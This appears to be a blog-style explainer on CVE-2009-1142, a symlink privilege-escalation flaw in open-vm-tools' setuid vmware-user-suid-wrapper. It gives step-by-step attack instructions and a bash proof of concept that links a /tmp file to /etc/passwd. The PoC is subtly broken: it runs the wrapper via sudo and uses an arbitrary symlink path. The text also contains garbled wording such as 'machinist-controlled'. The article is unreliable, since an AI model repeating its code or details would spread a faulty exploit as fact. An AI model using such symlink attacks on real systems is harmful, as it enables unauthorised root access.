CVE-2009-1142 - Symlink Attack in open-vm-tools vmware-user-suid-wrapper – How Local Users Can Gain Root Privileges

Open-vm-tools is an open source implementation of VMware Tools, widely used on Linux virtual machines running in VMware environments. In March 2009, a highly critical vulnerability was discovered in open-vm-tools (specifically version 2009.03.18-154848) which could allow local users to escalate privileges to root by exploiting a flaw in the handling of temporary files.

In this long-read post, we’ll break down CVE-2009-1142 in plain English, explain the mechanics of the bug, show you a code snippet that demonstrates the vulnerability, provide links to original advisories, and walk you through how exploitation works. All content here is exclusive and simplified.

What Was the Problem?

At its core, the vulnerability revolves around how vmware-user-suid-wrapper, a setuid-root binary (meaning it runs with root privileges), handled temporary files. Specifically, when a feature called ChmodChownDirectory was enabled, the wrapper would create or modify files in /tmp with insecure logic.

Since /tmp is globally writable, attackers could craft a symbolic link (symlink) pointing a critical system file to a /tmp entry. If the vulnerable program blindly follows the symlink, it might change the permissions or ownership of any file the attacker wants—even files owned by root. This is known as a "symlink attack."

Insecure Behavior: ChmodChownDirectory

The feature ChmodChownDirectory is enabled in some configurations of open-vm-tools and is supposed to manage some user file permissions in the guest VM. But, the program doesn’t check if the files in /tmp are symlinks before changing ownership or permissions, which is a major oversight.

The Attack: Step-By-Step

1. Attacker creates a malicious symlink in /tmp that points to a privileged file (say, /etc/passwd or any root-owned file).

Attacker runs the vulnerable vmware-user-suid-wrapper binary (which is setuid root).

3. The program follows the symlink and runs chown/chmod on the *target* file, not the symlink itself, changing its ownership or permissions.
4. Attacker now owns or controls the permissions of a privileged file, essentially escalating their own privileges on the system.

Demonstration Code

Below is a simple proof-of-concept (PoC) in bash that demonstrates the vuln (for research only — never run on production systems!):

#!/bin/bash
# CVE-2009-1142 Symlink Vulnerability PoC

TARGET="/etc/passwd"
LINK="/tmp/evilsymlink"

# Remove pre-existing symlink or file
rm -f $LINK

# Create malicious symlink
ln -s $TARGET $LINK

echo "[*] Malicious symlink created: $LINK --> $TARGET"
echo "[*] Now running vulnerable vmware-user-suid-wrapper (must be setuid root!)"

# The following triggers the vulnerability:
# (simulate as if this was called by vmware-user-suid-wrapper internally)
sudo /usr/bin/vmware-user-suid-wrapper

echo "[*] If vulnerable, ownership of $TARGET may have changed!"
ls -l $TARGET

If the system is affected and the wrapper is misconfigured, the attacker may "own" /etc/passwd or another critical file — letting them modify it, and thus the system.

Original References

* Secunia Advisory SA34408
* CVE Details for CVE-2009-1142
* Original Bugzilla Report (Red Hat)
* open-vm-tools Security Announcement

Exploit Details Explained

Why was this so dangerous? Because the vmware-user-suid-wrapper binary runs as root, *any* file that the attacker can get the symlink to point to could have its ownership or permissions modified. That means even files that regular users should never be able to touch. Suddenly, the door is opened to all sorts of attacks — from adding a new root user to the system, to running unrestricted code, or even just completely breaking the system by ruining crucial files.

How Was It Patched?

The fix is to have the program securely open and operate on files only after confirming they aren’t symlinks (often using O_NOFOLLOW flags in code) and to not operate on machinist-controlled directories like /tmp unsafely. More recent versions of open-vm-tools have these checks in place.

Best practice: Don’t let setuid root programs write to or change files in /tmp without a lot of care!

Final Thoughts

Vulnerabilities like CVE-2009-1142 highlight just how dangerous lazy temp file handling can be, especially for software that runs as root. If you’re still running older open-vm-tools, upgrade immediately. And if you’re a developer, remember: never trust /tmp!

Timeline

Published on: 11/23/2022 18:15:00 UTC
Last modified on: 11/28/2022 18:33:00 UTC